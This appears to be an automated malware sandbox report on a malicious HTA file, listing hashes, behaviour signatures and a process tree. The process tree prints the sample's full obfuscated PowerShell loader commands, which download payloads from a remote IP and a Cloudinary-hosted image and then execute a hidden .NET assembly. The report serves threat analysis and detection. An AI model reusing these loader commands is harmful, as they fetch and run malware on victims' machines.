Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14/01/2025, 05:12
Static task
static1
Behavioral task
behavioral1
Sample
verynicegirlwalkingarounftheworldmuuuah.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
verynicegirlwalkingarounftheworldmuuuah.hta
Resource
win10v2004-20241007-en
General
-
Target
verynicegirlwalkingarounftheworldmuuuah.hta
-
Size
47KB
-
MD5
6dc778742c1403851ff2659fcee24150
-
SHA1
7cc386b4ddf71303ed5a42a3ba8c8c8404ff5660
-
SHA256
ba54736b563266fd4f32553c63737596d3208a9112cb47d6513f68db2c2e6b67
-
SHA512
a897d85c10a466c4c0c964df03692401e53fe22d55f0aac47c0eb569573f68fa0cb5e9781679b318d626fdb9d7114a16a610c9b2840ab3b7dfd17f7ba93e1421
-
SSDEEP
384:3JOmk0yZAx8XKnnNXIsvZDmjbSu7lvRvw:3smyA+XeYJ1RZ4
Malware Config
Extracted
https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg%20
https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2088 powershell.exe 6 2628 powershell.exe 8 2628 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2088 powershell.exe -
pid Process 2628 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2088 powershell.exe 2628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2088 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2280 wrote to memory of 2984 2280 mshta.exe 30 PID 2280 wrote to memory of 2984 2280 mshta.exe 30 PID 2280 wrote to memory of 2984 2280 mshta.exe 30 PID 2280 wrote to memory of 2984 2280 mshta.exe 30 PID 2984 wrote to memory of 2088 2984 cmd.exe 32 PID 2984 wrote to memory of 2088 2984 cmd.exe 32 PID 2984 wrote to memory of 2088 2984 cmd.exe 32 PID 2984 wrote to memory of 2088 2984 cmd.exe 32 PID 2088 wrote to memory of 2788 2088 powershell.exe 33 PID 2088 wrote to memory of 2788 2088 powershell.exe 33 PID 2088 wrote to memory of 2788 2088 powershell.exe 33 PID 2088 wrote to memory of 2788 2088 powershell.exe 33 PID 2788 wrote to memory of 576 2788 csc.exe 34 PID 2788 wrote to memory of 576 2788 csc.exe 34 PID 2788 wrote to memory of 576 2788 csc.exe 34 PID 2788 wrote to memory of 576 2788 csc.exe 34 PID 2088 wrote to memory of 2452 2088 powershell.exe 37 PID 2088 wrote to memory of 2452 2088 powershell.exe 37 PID 2088 wrote to memory of 2452 2088 powershell.exe 37 PID 2088 wrote to memory of 2452 2088 powershell.exe 37 PID 2452 wrote to memory of 2628 2452 WScript.exe 38 PID 2452 wrote to memory of 2628 2452 WScript.exe 38 PID 2452 wrote to memory of 2628 2452 WScript.exe 38 PID 2452 wrote to memory of 2628 2452 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlwalkingarounftheworldmuuuah.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nv27r09r.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB03D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB03C.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsforgetmebackwithgoodnewsthi.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5969ddab37a62d1f1015a89414be0d900
SHA1c85841a3694e21accb7c433f5e42c592f28b7719
SHA256bb55024cdb33e6ac1fc74bb9258a5a8c61d07a486da5ef9fee30228fbf562886
SHA51236dceb91242ec0a4df0fdda3287fd929f946c0a0dde4d30a58e6853c2422120b6bb6607926e0f01fcc8b8bb35cfcd0555b6cd054ba9c79708d4334ce5bdba3b2
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD51048703e2eabb526170b7f84edcb1409
SHA15c8b8315aa745a78ba596c54b1311073973ed30c
SHA2560c42c67d915ac58142129e5e2b513390e336b1eb760a54196a90a1c199318652
SHA512c9ed190682302b60c232e7ee064697bb019674ea5fadb553f7ae7dd7df4516581c1c8856a1c4abaf5c9e34667ec9ffd24a84736542a36cd90fc364651fa8d534
-
Filesize
7KB
MD591fec5beb822a8592776a0ccb5e42855
SHA18697cf745933354da30abd0d2422c9870c1a9e28
SHA25621d94235f104c0a21ba2eaf6f139679b08b7cd57bba330febd83bd0bcb51e89e
SHA512b3681c581a3b5457f1bc0e6241174da9f7731bde662185b4b1c16537c0111fda675589204648fa0c4a45f78b72c25aef33ce4fa7475b6ad6ce0243a7ebb8cb87
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57cf8e9ed0db02304cd9ca232286a1a51
SHA1b764e6f4f779bc035df8fc99968da374070de6ef
SHA256ef53f3ab6e054bea9e460a70ca65fbdf6545e4bf9a0619863f6116656e780018
SHA512e1842c53bbdd96c1ce2bb4b283222c893fb4257010a59716f1ad02273439caef67c35fff1ec900d890d46276504310f1fca924d2646811a3589574e673ef8b9f
-
Filesize
229KB
MD528ea1c4f19651ab6cfd1828943bd7913
SHA103fc2176b4bb04fd903c217edd487efef0dd9505
SHA2569700962bc78cf83f0d780d391cfb1276490b0972d826424cd3631bdf78b24968
SHA5127c0479ccd140b149f8234171f53c4fde63c7d27e007c8bf3ff3ecd1389954d87f53f69845025d2762292195bd0fd33264e3cc39df00d7cb8003fd5210ce7e694
-
Filesize
652B
MD522816f70dd86d43f2d90766315ed150d
SHA1d6eb9255d809b600e06de78fd4efc38bb2e80216
SHA25625926953774c11dc626eb7d22ae75e28e015211a3ba680327293f2dd4bd66653
SHA5128c82f7b9f60f6183daca46770b0cafb3cef85d199f0bed5fedd3c65629bc1018db732a514754e0381116d7bef435c3621bff2d8ad0461bf7275cc478895e3033
-
Filesize
472B
MD50e78a3764ec34c2c2e3c81c978660c95
SHA1a8f89051d487578cc173f3fdfa512247a9c766e8
SHA2566ac8f316d174fada84aacee4991d18807ff23b2dd66a64acc54d3df8a713bd91
SHA5127b69d7b4e8878531a8f1c2574ba445d4f58f9c50fb21065b6214c23a6961173c83de177a8b6cc2bf4d7928d5c7a10e11c26e8108dcf483c3761dd10911b887a4
-
Filesize
309B
MD53582fe1cf4ac8b9b5761a5696e591e6e
SHA11888561848400b57d41d196cd497ed1d584f72b2
SHA256199f0c95c1233b792f6fe425922d2a14db162c11a8a69e344cee4b04898a5eb8
SHA512f01a7aaa75b3961360a0be0cd79c76f0adcdc2a4823314e619a97e8ff1829e7bc9381f00f2c49293bc3f35339d8498b14f78efc4f62acc1626596acebc581e5b